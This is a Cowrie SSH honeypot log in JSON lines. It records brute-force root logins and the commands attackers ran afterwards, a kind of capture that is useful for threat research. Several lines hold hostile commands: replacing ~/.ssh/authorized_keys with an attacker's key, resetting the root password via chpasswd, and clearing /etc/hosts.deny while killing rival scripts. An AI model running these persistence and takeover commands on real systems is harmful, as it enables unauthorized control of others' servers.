{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.020030Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:34.420230Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.420916Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.611727Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.708094Z","src_ip":"103.59.95.12","session":"328ca02c19a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:34.978543Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.979286Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.981259Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:34.982352Z","src_ip":"103.59.95.12","session":"328ca02c19a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:35.149367Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:35.620373Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T04:36:35.621044Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:35.799440Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:36.159309Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T04:36:36.160022Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:36.329968Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:36.759584Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T04:36:36.760238Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:36.931414Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.closed","duration":"23.7","message":"Connection lost after 23.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:36.932648Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":60490,"dst_ip":"1.2.3.4","dst_port":22,"session":"54383cda42ab","protocol":"ssh","message":"New connection: 103.59.95.12:60490 (1.2.3.4:22) [session: 54383cda42ab]","sensor":"my-vps","timestamp":"2025-09-09T04:37:51.928377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:37:51.929157Z","src_ip":"103.59.95.12","session":"54383cda42ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:37:52.186603Z","src_ip":"103.59.95.12","session":"54383cda42ab"}
{"eventid":"cowrie.login.failed","username":"access","password":"111","message":"login attempt [access/111] failed","sensor":"my-vps","timestamp":"2025-09-09T04:37:53.607582Z","src_ip":"103.59.95.12","session":"54383cda42ab"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:37:54.868473Z","src_ip":"103.59.95.12","session":"54383cda42ab"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":38892,"dst_ip":"1.2.3.4","dst_port":22,"session":"f057a6de57a7","protocol":"ssh","message":"New connection: 102.68.86.62:38892 (1.2.3.4:22) [session: f057a6de57a7]","sensor":"my-vps","timestamp":"2025-09-09T04:38:10.423880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:38:10.424823Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:38:10.593213Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.login.success","username":"root","password":"Root@2020","message":"login attempt [root/Root@2020] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:38:11.314959Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:11.733198Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:38:11.733925Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:38:11.734744Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:11.911917Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:12.276926Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:38:12.277579Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:38:12.449438Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:12.450449Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:24.713671Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T04:38:24.714319Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:24.904318Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:25.325129Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"echo \"root:6pa5dDKlWwOv\"|chpasswd|bash","message":"CMD: echo \"root:6pa5dDKlWwOv\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T04:38:25.325825Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c7088c6459d9f1e251d1302e692b673c127f1daafe9e083a4ae5e209654ad55c","size":21,"shasum":"c7088c6459d9f1e251d1302e692b673c127f1daafe9e083a4ae5e209654ad55c","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c7088c6459d9f1e251d1302e692b673c127f1daafe9e083a4ae5e209654ad55c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:25.542640Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:26.037843Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T04:38:26.038588Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T04:38:26.279449Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:26.280415Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:26.832018Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T04:38:26.832807Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:27.214592Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:28.533113Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T04:38:28.533857Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:29.212243Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:30.296895Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T04:38:30.297631Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T04:38:30.298134Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:30.654000Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:31.219097Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T04:38:31.219936Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:31.460543Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:32.058711Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T04:38:32.059530Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:32.367188Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:32.995826Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T04:38:32.996554Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:33.233463Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:33.724022Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T04:38:33.724810Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:34.019566Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:34.703323Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T04:38:34.704113Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:34.901015Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:35.386216Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T04:38:35.386986Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:35.613875Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:36.106319Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
